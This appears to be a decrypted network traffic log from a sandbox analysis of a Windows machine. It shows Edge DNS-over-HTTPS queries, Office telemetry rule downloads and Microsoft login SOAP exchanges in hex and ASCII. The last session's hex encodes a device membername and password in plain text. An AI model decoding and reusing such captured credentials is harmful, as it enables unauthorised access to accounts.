2024-11-02 16:56:46 UTC	1378	IN	Data Raw: 58 0d 04 41 31 f1 f1 a8 15 a1 54 1e 5a 8d 72 3d e2 47 40 31 01 b6 e2 e3 20 ba 53 87 b9 64 39 96 a9 1f 50 8d c3 df 89 4f 3c 44 83 14 ce e2 33 f3 a3 46 d1 e2 45 58 a7 2c f7 48 0a 04 81 50 14 d0 11 86 4d 66 e7 ff be d5 aa ce 18 47 ec d9 2c f8 22 13 e5 35 27 b7 b0 97 2a bf 2c 0b d7 07 48 d7 30 c9 86 93 1f b0 17 3e b8 b1 bc a7 01 17 51 9c 66 55 50 9a b0 bb 80 25 f5 6f 33 e1 cf d4 9d 1c 93 ba 54 72 a7 e2 f6 75 97 90 fe 6f d2 46 10 67 11 75 4c 7e d0 94 af e3 4d 5d b4 38 17 ad 83 c4 09 26 df 24 fb 10 6d 5d e5 56 f8 11 0d 2d bb f3 2c 35 9d 43 aa d3 dc cc 21 ae 95 db 49 63 90 e8 bb b5 a2 31 68 28 4f c1 46 84 c4 ae 85 65 77 6e 1d 5c 72 28 c5 cb d9 9f 0c 82 36 6a 85 c3 0c cb 86 67 50 98 fd a8 5e 6f c5 03 8b 54 f3 c2 30 f0 94 72 6d 96 45 e2 75 68 b3 3c 02 83 6b 79 2f Data Ascii: XA1TZr=G@1 Sd9PO<D3FEX,HPMfG,"5'*,H0>QfUP%o3TruoFguL~M]8&$m]V-,5C!Ic1h(OFewn\r(6jgP^oT0rmEuh<ky/
2024-11-02 16:56:46 UTC	1378	IN	Data Raw: 14 0d 73 e2 64 7e de 02 18 e4 0f c3 f4 76 5f 5c be dd ce 6f 88 69 ac e4 50 fa ee 07 ab c8 a0 8b 52 e9 bb 55 6b fa 9f c6 22 3c 29 b7 da 31 d5 9e ae 5a b0 94 e9 7c 5c e7 66 a1 94 56 e8 81 c0 57 d2 a5 5b 41 6a 0e 92 60 dd 9b c4 c3 77 12 c5 dc 29 96 c5 76 0c 56 10 bf 85 d3 7f df 78 05 8d e2 78 fc 2e d0 e2 68 c5 5e ba e2 78 a2 f7 ae 74 a2 c9 5d 23 c5 a1 dd 77 87 05 87 09 52 cb 31 68 27 3d 4b 9d 65 b2 de 77 fd b1 ff 96 4d 3f 5e 60 b9 1e 38 a4 9e c8 b0 ea d5 db 24 51 55 05 52 b6 f2 27 f0 e4 fd 6c 75 91 a7 7f 43 1e 77 ee c0 54 0b 56 cd 31 4f 5e ee ea 9b de 9a b3 38 11 b7 da d9 f9 e5 0f 50 4b 07 08 fd 45 55 f9 17 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6d 6e 2f 6d 65 Data Ascii: sd~v_\oiPRUk"<)1Z\|\fVW[Aj`w)vVxx.h^xt]#wR1h'=KewM?^`8$QUR'luCwTV1O^8PKEUPK!-_locales/mn/me

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.7	49857	20.190.159.4	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:45 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3528 Host: login.live.com
2024-11-02 16:56:45 UTC	3528	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-02 16:56:46 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sat, 02 Nov 2024 16:55:46 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C531_SN1 x-ms-request-id: 05032d15-89bc-4ee8-86c2-aea1e8b934a1 PPServer: PPV: 30 H: SN1PEPF0002F8EC V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sat, 02 Nov 2024 16:56:46 GMT Connection: close Content-Length: 1276
2024-11-02 16:56:46 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.7	49859	172.64.41.3	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-02 16:56:46 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-02 16:56:46 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 02 Nov 2024 16:56:46 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dc5a8e96ee5e946-DFW alt-svc: h3=":443"; ma=86400
2024-11-02 16:56:46 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fa 71 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomq^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.7	49858	162.159.61.3	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-02 16:56:46 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-02 16:56:46 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 02 Nov 2024 16:56:46 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dc5a8e96b8f486e-DFW alt-svc: h3=":443"; ma=86400
2024-11-02 16:56:46 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1b 00 04 8e fa 72 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomr^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.7	49866	172.64.41.3	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-02 16:56:46 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-02 16:56:46 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 02 Nov 2024 16:56:46 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dc5a8e9fb366b6a-DFW alt-svc: h3=":443"; ma=86400
2024-11-02 16:56:46 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e9 00 04 8e fa 73 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcoms^)

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.7	49861	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:46 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:46 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165646Z-15869dbbcc6pfq2ghC1DFW0bk000000000p000000000f8qk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:46 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.7	49862	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:46 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 051fa910-c01e-00ad-6e62-2ca2b9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165646Z-r159446fcd7xfscrhC1DFWamb000000001q00000000087yu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:46 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.7	49863	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:46 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: fc004688-501e-00a3-0a24-2cc0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165646Z-r159446fcd7tc5j5hC1DFWrhs000000001zg000000000txv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:46 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.7	49865	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:46 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: a8aebf1b-601e-003d-5d0c-2c6f25000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165646Z-176bd8f9bc56w2rshC1DFWd88n00000002r0000000007mnc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:46 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.7	49864	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:46 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: b98889fe-601e-0001-3b0a-2cfaeb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165646Z-176bd8f9bc5pqws8hC1DFW15kc0000000230000000005qvm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:46 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.7	49860	20.190.159.4	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:46 UTC	446	OUT	POST /ppsecure/deviceaddcredential.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 7642 Host: login.live.com
2024-11-02 16:56:46 UTC	7642	OUT	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 71 74 78 65 65 68 79 65 72 73 71 63 72 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 76 73 52 40 71 53 2b 71 40 2b 5e 35 59 60 50 29 79 64 7a 6f 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 71 74 6c 74 6e 74 63 62 72 65 71 75 61 6a 3c 2f 4f 6c 64 4d Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" 